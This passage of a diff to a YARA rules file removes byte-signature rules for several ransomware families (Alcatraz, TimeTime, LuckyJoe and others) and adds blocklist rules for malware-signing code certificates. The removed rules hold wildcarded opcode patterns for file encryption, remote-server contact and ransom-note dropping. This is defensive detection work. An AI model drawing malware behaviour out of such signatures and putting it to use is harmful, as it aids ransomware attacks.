-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 75 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B
-            55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? EB ?? B8
-        }
-		$drop_ransom_note_no_dir_exclusion = {
-            8D 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 88 85 ?? ?? ?? ?? 33 C9 88 8D ?? ??
-            ?? ?? 33 D2 88 95 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 50 0F B6 8D ?? ?? ?? ?? 51 0F B6
-            95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ??
-            50 8B 4B ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B
-            5D ?? B8 ?? ?? ?? ?? C3 C7 45
-        }
-		$find_files_p1 = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
-            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
-            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
-            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
-            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
-            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
-        }
-		$find_files_p2 = {
-            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
-            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
-            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D 45
-            ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4B ?? 51
-            FF 15 ?? ?? ?? ?? 83 E0 ?? 74 ?? 8B 53 ?? 52 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 8B 43 ??
-            50 FF 15 ?? ?? ?? ?? 8B 4B ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 53
-            ?? 52 8D 45 ?? 50 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 55 ?? 52 8B 43 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D
-            4D ?? 51 83 EC ?? 8B D4 89 A5 ?? ?? ?? ?? 52 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 43 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( ( $exclude_directories_and_drop_ransom_note ) or ( $drop_ransom_note_no_dir_exclusion ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and ( pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" or pe.signatures [ i ] . serial == "f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" ) and 1606953600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Alcatraz : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Alcatraz ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ff37483-ae63-5c82-a355-81ef68e2f663"
-		date = "2020-07-28"
-		modified = "2020-07-28"
+		id = "fd1b83aa-bfcc-590c-8f97-875badf09698"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Alcatraz.yara#L1-L91"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11498-L11514"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ddd35c8da0c08bce17cacfba8bb8a8b8a8c08c3e59261a88a79c63b03d29000f"
+		logic_hash = "9ec7e84c77583bd52ccfb8d6d5831f3634ed0a401d8103376c4775b7f2c43d81"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Alcatraz"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9
-            ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ??
-            ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
-            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ??
-            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 D0 85 D2 75 ?? 83 7D ?? ?? 74 ?? 6A
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            75 ?? 83 C8 ?? EB ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
-            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_server = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
-            7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 C2 ?? 52 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
-            55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 4D ?? 0F BE 11 83 FA ??
-            74 ?? 8B 45 ?? 03 45 ?? 0F BE 08 83 F9 ?? 74 ?? 8B 55 ?? 03 55 ?? 8B 45 ?? 03 45 ??
-            8A 08 88 0A EB ?? 8B 55 ?? 03 55 ?? C6 02 ?? EB ?? EB ?? EB ?? 83 7D ?? ?? 0F 87 ??
-            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52
-            FF 15 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_server_2 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? A1 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52
-            A1 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 0D ?? ?? ?? ?? 51 68
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
-            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 68
-            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 55 ??
-            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
-            45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8B 55 ?? 83
-            C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33
-            C0 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33
-            C0 EB ?? EB ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8B 4D ??
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 0F 87 ??
-            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51
-            FF 15 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server and $remote_server_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" and 1647302400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timetime : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TimeTime ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "27bff941-01ce-5bf7-a9d8-d01d2db3bfd3"
-		date = "2022-02-21"
-		modified = "2022-02-21"
+		id = "727167de-5678-558d-b948-8a40839d0500"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara#L1-L75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11516-L11534"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "43867dd793bc84e6f39ca2de1aff4047a742b295dc4df94cd337bd2ef89e4a62"
+		logic_hash = "e275a1fd2eb931030fa8b5fc11cd1b335835aaa553a42455053cb93fef5e6e72"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TimeTime"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$rename_files = {
-            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ??
-            ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$find_files = {
-            00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ??
-            ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C
-            ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ??
-            ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
-            ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
-            32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ??
-            00 00 DE ?? 06 0C 2B ?? 08 2A
-        }
-		$encrypt_folder = {
-            00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C
-            00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19
-            73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ??
-            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C
-            ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ??
-            ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$encrypt_files = {
-            00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B
-            ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ??
-            17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E
-            ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $encrypt_folder ) and ( $rename_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES, INC" and ( pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" or pe.signatures [ i ] . serial == "9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" ) and 1601683200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Luckyjoe : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LuckyJoe ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8dc98d71-b79d-5b09-9383-11f2b57baeb5"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "0a196a18-002e-58e4-bff2-83d1a67a82ce"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
